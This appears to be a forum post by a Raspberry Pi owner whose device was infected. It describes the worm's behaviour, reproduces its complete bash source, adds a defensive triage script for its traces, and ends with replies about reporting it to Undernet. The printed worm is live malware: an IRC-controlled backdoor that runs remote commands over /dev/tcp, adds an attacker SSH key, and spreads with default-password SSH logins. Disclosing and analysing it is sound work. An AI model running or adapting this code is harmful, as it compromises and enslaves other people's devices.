Today, my Raspberry Pi was hacked, and the load went from 0.01 to 8 or more. zmap is the top process, hogging the CPU.
So I checked /etc/rc.local, and it has a line that runs /opt/6vRKumYc. The 6vRKumYc file is a bash script that does tasks like these:
- copy itself and add its file path to /etc/rc.local
- kill all processes named minerd, node, nodejs, ktx, arm*, zmap, kaiten and perl
- add an /etc/hosts entry for bins.deutschland-zahlung.eu (mapping it to 127.0.0.1)
- remove the .bashrc of root and pi
- change the default pi password
- create authorized_keys for root
- create /tmp/public.pem
- create an IRC bot and connect it to one of these Undernet IRC servers:
  - ix1.undernet.org
  - ix2.undernet.org
  - Ashburn.Va.Us.UnderNet.org
  - Bucharest.RO.EU.Undernet.Org
  - Budapest.HU.EU.UnderNet.org
  - Chicago.IL.US.Undernet.org
- join the channel #biret
- scan all devices in the same IP range, then log in as the pi user and copy itself to the other devices
Here is a copy of the code, so that the authorities can perhaps use it to track down the malware author:
```bash
#!/bin/bash
MYSELF=`realpath $0`
DEBUG=/dev/null
echo $MYSELF >> $DEBUG
if [ "$EUID" -ne 0 ]
then
  NEWMYSELF=`mktemp -u 'XXXXXXXX'`
  sudo cp $MYSELF /opt/$NEWMYSELF
  sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
  sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
  sudo sh -c "echo 'exit 0' >> /etc/rc.local"
  sleep 1
  sudo reboot
else
  TMP1=`mktemp`
  echo $TMP1 >> $DEBUG
  killall bins.sh
  killall minerd
  killall node
  killall nodejs
  killall ktx-armv4l
  killall ktx-i586
  killall ktx-m68k
  killall ktx-mips
  killall ktx-mipsel
  killall ktx-powerpc
  killall ktx-sh4
  killall ktx-sparc
  killall arm5
  killall zmap
  killall kaiten
  killall perl
  echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts
  rm -rf /root/.bashrc
  rm -rf /home/pi/.bashrc
  usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi
  mkdir -p /root/.ssh
  echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B" >> /root/.ssh/authorized_keys
  echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  rm -rf /tmp/ktx*
  rm -rf /tmp/cpuminer-multi
  rm -rf /var/tmp/kaiten
  cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs
glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW
rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF
WRq+Z8HYMvPlgSRA3wIDAQAB
-----END PUBLIC KEY-----
EOFMARKER
  BOT=`mktemp -u 'XXXXXXXX'`
  cat > /tmp/$BOT <<'EOFMARKER'
#!/bin/bash
SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}
while [ true ]; do
  arr[0]="ix1.undernet.org"
  arr[1]="ix2.undernet.org"
  arr[2]="Ashburn.Va.Us.UnderNet.org"
  arr[3]="Bucharest.RO.EU.Undernet.Org"
  arr[4]="Budapest.HU.EU.UnderNet.org"
  arr[5]="Chicago.IL.US.Undernet.org"
  rand=$[$RANDOM % 6]
  svr=${arr[$rand]}
  eval 'exec 3<>/dev/tcp/$svr/6667;'
  if [[ ! "$?" -eq 0 ]] ; then
    continue
  fi
  echo $NICK
  eval 'printf "NICK $NICK\r\n" >&3;'
  if [[ ! "$?" -eq 0 ]] ; then
    continue
  fi
  eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
  if [[ ! "$?" -eq 0 ]] ; then
    continue
  fi
  # Main loop
  while [ true ]; do
    eval "read msg_in <&3;"
    if [[ ! "$?" -eq 0 ]] ; then
      break
    fi
    if [[ "$msg_in" =~ "PING" ]] ; then
      printf "PONG %s\n" "${msg_in:5}";
      eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
      if [[ ! "$?" -eq 0 ]] ; then
        break
      fi
      sleep 1
      eval 'printf "JOIN #biret\r\n" >&3;'
      if [[ ! "$?" -eq 0 ]] ; then
        break
      fi
    elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
      privmsg_h=$(echo $msg_in| cut -d':' -f 3)
      privmsg_data=$(echo $msg_in| cut -d':' -f 4)
      privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)
      hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
      sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`
      if [[ "$sign" == "$hash" ]] ; then
        CMD=`echo $privmsg_data | base64 -d -i`
        RES=`bash -c "$CMD" | base64 -w 0`
        eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
          break
        fi
      fi
    fi
  done
done
EOFMARKER
  chmod +x /tmp/$BOT
  nohup /tmp/$BOT 2>&1 > /tmp/bot.log &
  rm /tmp/nohup.log -rf
  rm -rf nohup.out
  sleep 3
  rm -rf /tmp/$BOT
  NAME=`mktemp -u 'XXXXXXXX'`
  date > /tmp/.s
  apt-get update -y --force-yes
  apt-get install zmap sshpass -y --force-yes
  while [ true ]; do
    FILE=`mktemp`
    zmap -p 22 -o $FILE -n 100000
    killall ssh scp
    for IP in `cat $FILE`
    do
      sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
      sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberryraspberry993311 ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
    done
    rm -rf $FILE
    sleep 10
  done
fi
```
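A triage script for the traces this worm leaves on a Pi, as an added example that is not part of the original post. It checks the indicators visible in the script above (the rc.local line, the hosts entry, root's authorized_keys, the replaced pi password hash, /tmp/public.pem and /opt/.r) and builds a constructed sample tree so it can be tried offline; the paths and the sample contents are assumptions for the demo.

```shell
#!/bin/sh
# Triage helper for the rc.local/IRC-bot worm analysed above. This is an added
# example, not code from the post. Each check takes a path argument, so it works
# on the live system (root "/") or on a mounted SD card image.

# Indicators copied from the script: the sinkholed domain, the start of the
# attacker's authorized_keys entry and the salt of the replacement pi password.
WORM_HOST='bins.deutschland-zahlung.eu'
WORM_KEY='AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq'
WORM_SALT='$6$vGkGPKUr$'

# Persistence: rc.local gets a bare "/opt/<8 chars>" line (from mktemp -u 'XXXXXXXX').
check_rc_local() {           # $1 = rc.local to inspect; prints the line, exit 0 if found
    grep -E '^/opt/[A-Za-z0-9]{8}$' "$1" 2>/dev/null
}
check_hosts() {              # $1 = hosts file to inspect
    grep -F "$WORM_HOST" "$1" 2>/dev/null
}
check_authorized_keys() {    # $1 = root's authorized_keys to inspect
    grep -F "$WORM_KEY" "$1" 2>/dev/null
}
check_shadow() {             # $1 = shadow file to inspect (needs root on a live box)
    grep -F "$WORM_SALT" "$1" 2>/dev/null
}

# Count the indicators that fire under a filesystem root; prints the count.
triage() {                   # $1 = "/" or the mount point of an SD card image
    root=${1%/}; hits=0
    check_rc_local "$root/etc/rc.local" >/dev/null && hits=$((hits+1))
    check_hosts "$root/etc/hosts" >/dev/null && hits=$((hits+1))
    check_authorized_keys "$root/root/.ssh/authorized_keys" >/dev/null && hits=$((hits+1))
    check_shadow "$root/etc/shadow" >/dev/null && hits=$((hits+1))
    [ -f "$root/tmp/public.pem" ] && hits=$((hits+1))   # dropped command-verification key
    [ -f "$root/opt/.r" ] && hits=$((hits+1))           # list of hosts it copied itself to
    echo "$hits"
}

# Build a constructed infected tree (sample data, not taken from a real device)
# so the checks can be exercised offline; prints the directory.
sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/etc" "$d/root/.ssh" "$d/tmp" "$d/opt"
    printf '#!/bin/sh -e\n/opt/6vRKumYc\nexit 0\n' > "$d/etc/rc.local"
    printf '127.0.0.1 localhost\n127.0.0.1 %s\n' "$WORM_HOST" > "$d/etc/hosts"
    printf 'ssh-rsa %s... root@example\n' "$WORM_KEY" > "$d/root/.ssh/authorized_keys"
    printf 'pi:%sfakehash:17000:0:99999:7:::\n' "$WORM_SALT" > "$d/etc/shadow"
    : > "$d/tmp/public.pem"
    echo "$d"
}
```

Run `triage /` as root on a suspect Pi, or point it at the mount point of an SD card image; the count covers only the indicators listed here, so a zero does not prove the device is clean.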
I joined us.undernet.org on the channels #Help, #cservice, #hack, #theguard and #abuse, but there was no moderator/admin online, so I sent an email to abuse-expoits@undernet.org, but there is no such address on the server.
Maybe abuse-exploits@…?
I’m on Undernet and saw this. I’ve alerted one of the IRCops, awaiting some info now.
Thanks, I hope someone can track it.